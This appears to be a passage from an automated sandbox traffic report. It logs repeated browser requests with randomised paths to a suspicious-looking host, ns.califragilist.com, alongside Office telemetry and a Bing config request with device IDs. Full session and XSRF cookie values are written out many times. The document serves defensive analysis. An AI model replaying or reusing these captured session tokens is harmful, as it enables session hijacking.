XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /rsvqFqFKEhRzIVFcaSXFIFklJZjDuvi98kzxNrUiaZdwEP3buTKNzKLKef192 HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /qrXjbEVVLbAj1HnXmTFefBQ26ZHPam28i67132 HTTP/1.1Host: ns.califragilist.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /ijvpLYN3FAsYRkMp2S19m5x6bM7wkDZkl3hONe6DDp7xliNnk3uGhWQsRnx47i12202 HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /mnTXBHC8KHjpcgmT4J29cjPITNuPijXMtYQTHs1fF2R078145 HTTP/1.1Host: ns.califragilist.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /qrOghFHUJfJSFxz9cKcd4AueKjk04mMjNqxfmmstDVeA4AjY2yeMJmi1lZgTvAEOPcd240 HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /ijfp9iKnrTgHCYE8rTpOvmRwx1aOUavp0AinFOw6GvICG656170 HTTP/1.1Host: ns.califragilist.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /uvvJrrwLawKtH7uvbTOLQFH5urwDkIf67DrJWCuu0sPsB6Cxztqv96T1CyIB9ef255 HTTP/1.1Host: ns.califragilist.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ns.califragilist.com/7PXU/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /yzCIRquaPFUjERvoqJYr7I3cogJBrGklDFyrsAZD9QeqnvfO79zHfIab179 HTTP/1.1Host: ns.califragilist.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /rsvqFqFKEhRzIVFcaSXFIFklJZjDuvi98kzxNrUiaZdwEP3buTKNzKLKef192 HTTP/1.1Host: ns.califragilist.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /yf76EadsgQyK5Jwh8E6cIKXM1akRlkqgnjcDg3IU0lvqLFvh HTTP/1.1Host: ns.califragilist.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlRjNGdzdE1qREM0Y01uZmVRWnFBT2c9PSIsInZhbHVlIjoiSkd0UXJWbU9EYWxHZWZhN2lkNTY3YVJWcFJuaEI3UDhiNForZ1RvZml2eUlSTDgvakVWcEt2cHpITndCaTQ0QThqak9CS08wQWFXcjNJMURId2dCc2ZsdENpVlhyR2lMWXN6Q0U3a24xQWNYaU0xcE5KVCtiMkpHM2wyT1BYWVkiLCJtYWMiOiI2M2Q3ZjFkNGExMDQwNDcyOTcyNDgxZDZhNzU3M2QwNDI2ZTk3ZGFjMzk2NjFhMDE2ZDJiMTdkMDZiMzZhNTEwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVLZzJQQ2lmcFZFbFF3SEdWbjRkU0E9PSIsInZhbHVlIjoiZ09nZDVxQnZqYkoyWndJOHVPeEgzR0RhNVB5bmNBOFo1WXpxTFVXYkRlbzdRS2R0SmFZZHpJV1BRRG9FbnNVczM2anliZCtCOHUvQmVDNmlhSEhLelpDSzhScGdnRUd2TXljVm1tWUJaeUdMZEg3M3YwaXNzU0NEL1g3akRVS0EiLCJtYWMiOiI4Yjk2N2YwYjJhZTY5OTk0ODJmZjNkYWI2NDMwZDk1YjIyNDJlMDMwMTY3OWFkMTNmODQ4ZmM3ZWQxOTRmNDQ1IiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /ijvpLYN3FAsYRkMp2S19m5x6bM7wkDZkl3hONe6DDp7xliNnk3uGhWQsRnx47i12202 HTTP/1.1Host: ns.califragilist.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlRjNGdzdE1qREM0Y01uZmVRWnFBT2c9PSIsInZhbHVlIjoiSkd0UXJWbU9EYWxHZWZhN2lkNTY3YVJWcFJuaEI3UDhiNForZ1RvZml2eUlSTDgvakVWcEt2cHpITndCaTQ0QThqak9CS08wQWFXcjNJMURId2dCc2ZsdENpVlhyR2lMWXN6Q0U3a24xQWNYaU0xcE5KVCtiMkpHM2wyT1BYWVkiLCJtYWMiOiI2M2Q3ZjFkNGExMDQwNDcyOTcyNDgxZDZhNzU3M2QwNDI2ZTk3ZGFjMzk2NjFhMDE2ZDJiMTdkMDZiMzZhNTEwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVLZzJQQ2lmcFZFbFF3SEdWbjRkU0E9PSIsInZhbHVlIjoiZ09nZDVxQnZqYkoyWndJOHVPeEgzR0RhNVB5bmNBOFo1WXpxTFVXYkRlbzdRS2R0SmFZZHpJV1BRRG9FbnNVczM2anliZCtCOHUvQmVDNmlhSEhLelpDSzhScGdnRUd2TXljVm1tWUJaeUdMZEg3M3YwaXNzU0NEL1g3akRVS0EiLCJtYWMiOiI4Yjk2N2YwYjJhZTY5OTk0ODJmZjNkYWI2NDMwZDk1YjIyNDJlMDMwMTY3OWFkMTNmODQ4ZmM3ZWQxOTRmNDQ1IiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /qrOghFHUJfJSFxz9cKcd4AueKjk04mMjNqxfmmstDVeA4AjY2yeMJmi1lZgTvAEOPcd240 HTTP/1.1Host: ns.califragilist.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlRjNGdzdE1qREM0Y01uZmVRWnFBT2c9PSIsInZhbHVlIjoiSkd0UXJWbU9EYWxHZWZhN2lkNTY3YVJWcFJuaEI3UDhiNForZ1RvZml2eUlSTDgvakVWcEt2cHpITndCaTQ0QThqak9CS08wQWFXcjNJMURId2dCc2ZsdENpVlhyR2lMWXN6Q0U3a24xQWNYaU0xcE5KVCtiMkpHM2wyT1BYWVkiLCJtYWMiOiI2M2Q3ZjFkNGExMDQwNDcyOTcyNDgxZDZhNzU3M2QwNDI2ZTk3ZGFjMzk2NjFhMDE2ZDJiMTdkMDZiMzZhNTEwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVLZzJQQ2lmcFZFbFF3SEdWbjRkU0E9PSIsInZhbHVlIjoiZ09nZDVxQnZqYkoyWndJOHVPeEgzR0RhNVB5bmNBOFo1WXpxTFVXYkRlbzdRS2R0SmFZZHpJV1BRRG9FbnNVczM2anliZCtCOHUvQmVDNmlhSEhLelpDSzhScGdnRUd2TXljVm1tWUJaeUdMZEg3M3YwaXNzU0NEL1g3akRVS0EiLCJtYWMiOiI4Yjk2N2YwYjJhZTY5OTk0ODJmZjNkYWI2NDMwZDk1YjIyNDJlMDMwMTY3OWFkMTNmODQ4ZmM3ZWQxOTRmNDQ1IiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /uvvJrrwLawKtH7uvbTOLQFH5urwDkIf67DrJWCuu0sPsB6Cxztqv96T1CyIB9ef255 HTTP/1.1Host: ns.califragilist.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlRjNGdzdE1qREM0Y01uZmVRWnFBT2c9PSIsInZhbHVlIjoiSkd0UXJWbU9EYWxHZWZhN2lkNTY3YVJWcFJuaEI3UDhiNForZ1RvZml2eUlSTDgvakVWcEt2cHpITndCaTQ0QThqak9CS08wQWFXcjNJMURId2dCc2ZsdENpVlhyR2lMWXN6Q0U3a24xQWNYaU0xcE5KVCtiMkpHM2wyT1BYWVkiLCJtYWMiOiI2M2Q3ZjFkNGExMDQwNDcyOTcyNDgxZDZhNzU3M2QwNDI2ZTk3ZGFjMzk2NjFhMDE2ZDJiMTdkMDZiMzZhNTEwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkVLZzJQQ2lmcFZFbFF3SEdWbjRkU0E9PSIsInZhbHVlIjoiZ09nZDVxQnZqYkoyWndJOHVPeEgzR0RhNVB5bmNBOFo1WXpxTFVXYkRlbzdRS2R0SmFZZHpJV1BRRG9FbnNVczM2anliZCtCOHUvQmVDNmlhSEhLelpDSzhScGdnRUd2TXljVm1tWUJaeUdMZEg3M3YwaXNzU0NEL1g3akRVS0EiLCJtYWMiOiI4Yjk2N2YwYjJhZTY5OTk0ODJmZjNkYWI2NDMwZDk1YjIyNDJlMDMwMTY3OWFkMTNmODQ4ZmM3ZWQxOTRmNDQ1IiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /client/config?cc=CH&setlang=en-CH HTTP/1.1X-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-UserAgeClass: UnknownX-BM-Market: CHX-BM-DateFormat: dd/MM/yyyyX-Device-OSSKU: 48X-BM-DTZ: -300X-DeviceID: 01000A410900B03DX-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75X-Search-TimeZone: Bias=300; StandardBias=0; TimeZoneKeyName=Eastern Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: 